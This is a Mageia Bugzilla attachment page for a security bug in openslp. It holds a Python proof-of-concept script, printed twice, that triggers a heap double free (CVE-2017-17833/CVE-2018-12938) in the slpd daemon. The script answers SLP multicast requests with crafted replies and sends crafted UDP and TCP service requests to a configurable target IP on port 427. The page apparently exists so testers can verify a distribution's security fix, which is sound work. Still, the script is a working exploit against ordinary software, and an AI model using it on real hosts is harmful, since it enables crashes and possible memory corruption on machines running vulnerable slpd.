Mageia Bugzilla – Attachment 10288 Details for
Bug 23310
openslp new security issue CVE-2017-17833
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
Log In
[x]
|
New Account
|
Forgot Password
Proof of concept trigger script for CVE-2018-12938/CVE-2017-17833
openslp-2.0.0-double-free-poc.py (text/plain), 3.47 KB, created by
Len Lawrence
on 2018-07-21 18:45:26 CEST
(
hide
)
Description:
Proof of concept trigger script for CVE-2018-12938/CVE-2017-17833
Filename:
MIME Type:
Creator:
Len Lawrence
Created:
2018-07-21 18:45:26 CEST
Size:
3.47 KB
patch
obsolete
>import os >import sys >import struct >import socket > >targetIp = "192.168.1.3" > >abuf = ("\x02\x08\xff\xff\xff\x00\x00\x00\x00\x00\x58\x27\x00\x02\x65\x6e" + > "\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + > "\x00\x00\x00\x00\x00\x00\x00") > >mcastserversock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) >mcastserversock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) >mcastserversock.bind(('239.255.255.253', 427)) >mreq = struct.pack("4sl", socket.inet_aton('239.255.255.253'), socket.INADDR_ANY) >mcastserversock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq) > >print "Proof-of-concept heap massager and double-free trigger for openslp-2.0.0 slpd\nRun this script before launching slpd and remember to update targetIp variable." >print "[-] Waiting for multicast service request from slpd..." >data, addr = mcastserversock.recvfrom(1024) >print "[+] Got request! Sending reply to " + addr[0] + " " + str(addr[1]) + "..." >mcastserversock.sendto(abuf, (addr[0], addr[1])) > >localhostsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) >localhostsock.bind(('127.0.0.1', 0)) >print "[-] Sending first Service Request to 127.0.0.1:427 from 127.0.0.1:" + str(localhostsock.getsockname()[1]) + "..." > >buf = ("\x02\x01\x00\x00\x31\x00\x00\x00\x00\x00\x66\x0b\x00\x02\x65\x6e" + > "\x00\x00\x00\x17\x73\x65\x72\x76\x69\x63\x65\x3a\x64\x69\x72\x65" + > "\x63\x74\x6f\x72\x79\x2d\x61\x67\x65\x6e\x74\x00\x00\x00\x00\x00" + > "\x00") > >localhostsock.sendto(buf, ('127.0.0.1', 427)) >print "[-] Waiting for response..." >data, addr = localhostsock.recvfrom(1024) >print "[+] Received " + str(len(data)) + " bytes from " + addr[0] + ":" + str(addr[1]) > >clientsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) >clientsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) >clientsock.bind(('0.0.0.0', 0)) >print "[-] Sending packet to (multicast) 239.255.255.253:427 from " + targetIp + ":" + str(clientsock.getsockname()[1]) + "..." >mreq = struct.pack("4sl", socket.inet_aton('239.255.255.253'), socket.INADDR_ANY) >clientsock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq) > >buf = ("\x02\x01\x00\x00\x38\x20\x00\x00\x00\x00\x66\x0c\x00\x02\x65\x6e" + > "\x00\x00\x00\x17\x73\x65\x72\x76\x69\x63\x65\x3a\x64\x69\x72\x65" + > "\x63\x74\x6f\x72\x79\x2d\x61\x67\x65\x6e\x74\x00\x07\x44\x45\x46" + > "\x41\x55\x4c\x54\x00\x00\x00\x00") > >clientsock.sendto(buf, ('239.255.255.253', 427)) > >data, addr = mcastserversock.recvfrom(1024) >print "[+] Got request! Sending reply to " + addr[0] + " " + str(addr[1]) + "..." >mcastserversock.sendto(abuf, (addr[0], addr[1])) > >clientsock.close() >print "[+] Received " + str(len(data)) + " bytes from " + addr[0] + ":" + str(addr[1]) > >buf = ("\x02\x01\x00\x00\x38\x00\x00\x00\x00\x00\x66\x0d\x00\x02\x65\x6e" + > "\x00\x00\x00\x17\x73\x65\x72\x76\x69\x63\x65\x3a\x64\x69\x72\x65" + > "\x63\x74\x6f\x72\x79\x2d\x61\x67\x65\x6e\x74\x00\x07\x44\x45\x46" + > "\x41\x55\x4c\x54\x00\x00\x00\x00") > >tcpclientsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) >print "[-] Connecting to " + targetIp + ":427..." >tcpclientsock.connect((targetIp, 427)) >print "[+] Connected. Sending..." >tcpclientsock.send(buf) >print "[-] Sent packet to " + targetIp + ":427 from " + targetIp + ":" + str(tcpclientsock.getsockname()[1]) + "...\n[+] Done!"
import os import sys import struct import socket targetIp = "192.168.1.3" abuf = ("\x02\x08\xff\xff\xff\x00\x00\x00\x00\x00\x58\x27\x00\x02\x65\x6e" + "\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00") mcastserversock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) mcastserversock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) mcastserversock.bind(('239.255.255.253', 427)) mreq = struct.pack("4sl", socket.inet_aton('239.255.255.253'), socket.INADDR_ANY) mcastserversock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq) print "Proof-of-concept heap massager and double-free trigger for openslp-2.0.0 slpd\nRun this script before launching slpd and remember to update targetIp variable." print "[-] Waiting for multicast service request from slpd..." data, addr = mcastserversock.recvfrom(1024) print "[+] Got request! Sending reply to " + addr[0] + " " + str(addr[1]) + "..." mcastserversock.sendto(abuf, (addr[0], addr[1])) localhostsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) localhostsock.bind(('127.0.0.1', 0)) print "[-] Sending first Service Request to 127.0.0.1:427 from 127.0.0.1:" + str(localhostsock.getsockname()[1]) + "..." buf = ("\x02\x01\x00\x00\x31\x00\x00\x00\x00\x00\x66\x0b\x00\x02\x65\x6e" + "\x00\x00\x00\x17\x73\x65\x72\x76\x69\x63\x65\x3a\x64\x69\x72\x65" + "\x63\x74\x6f\x72\x79\x2d\x61\x67\x65\x6e\x74\x00\x00\x00\x00\x00" + "\x00") localhostsock.sendto(buf, ('127.0.0.1', 427)) print "[-] Waiting for response..." data, addr = localhostsock.recvfrom(1024) print "[+] Received " + str(len(data)) + " bytes from " + addr[0] + ":" + str(addr[1]) clientsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) clientsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) clientsock.bind(('0.0.0.0', 0)) print "[-] Sending packet to (multicast) 239.255.255.253:427 from " + targetIp + ":" + str(clientsock.getsockname()[1]) + "..." mreq = struct.pack("4sl", socket.inet_aton('239.255.255.253'), socket.INADDR_ANY) clientsock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq) buf = ("\x02\x01\x00\x00\x38\x20\x00\x00\x00\x00\x66\x0c\x00\x02\x65\x6e" + "\x00\x00\x00\x17\x73\x65\x72\x76\x69\x63\x65\x3a\x64\x69\x72\x65" + "\x63\x74\x6f\x72\x79\x2d\x61\x67\x65\x6e\x74\x00\x07\x44\x45\x46" + "\x41\x55\x4c\x54\x00\x00\x00\x00") clientsock.sendto(buf, ('239.255.255.253', 427)) data, addr = mcastserversock.recvfrom(1024) print "[+] Got request! Sending reply to " + addr[0] + " " + str(addr[1]) + "..." mcastserversock.sendto(abuf, (addr[0], addr[1])) clientsock.close() print "[+] Received " + str(len(data)) + " bytes from " + addr[0] + ":" + str(addr[1]) buf = ("\x02\x01\x00\x00\x38\x00\x00\x00\x00\x00\x66\x0d\x00\x02\x65\x6e" + "\x00\x00\x00\x17\x73\x65\x72\x76\x69\x63\x65\x3a\x64\x69\x72\x65" + "\x63\x74\x6f\x72\x79\x2d\x61\x67\x65\x6e\x74\x00\x07\x44\x45\x46" + "\x41\x55\x4c\x54\x00\x00\x00\x00") tcpclientsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "[-] Connecting to " + targetIp + ":427..." tcpclientsock.connect((targetIp, 427)) print "[+] Connected. Sending..." tcpclientsock.send(buf) print "[-] Sent packet to " + targetIp + ":427 from " + targetIp + ":" + str(tcpclientsock.getsockname()[1]) + "...\n[+] Done!"
View Attachment As Raw
Actions:
View
Attachments on
bug 23310
: 10288 |
10289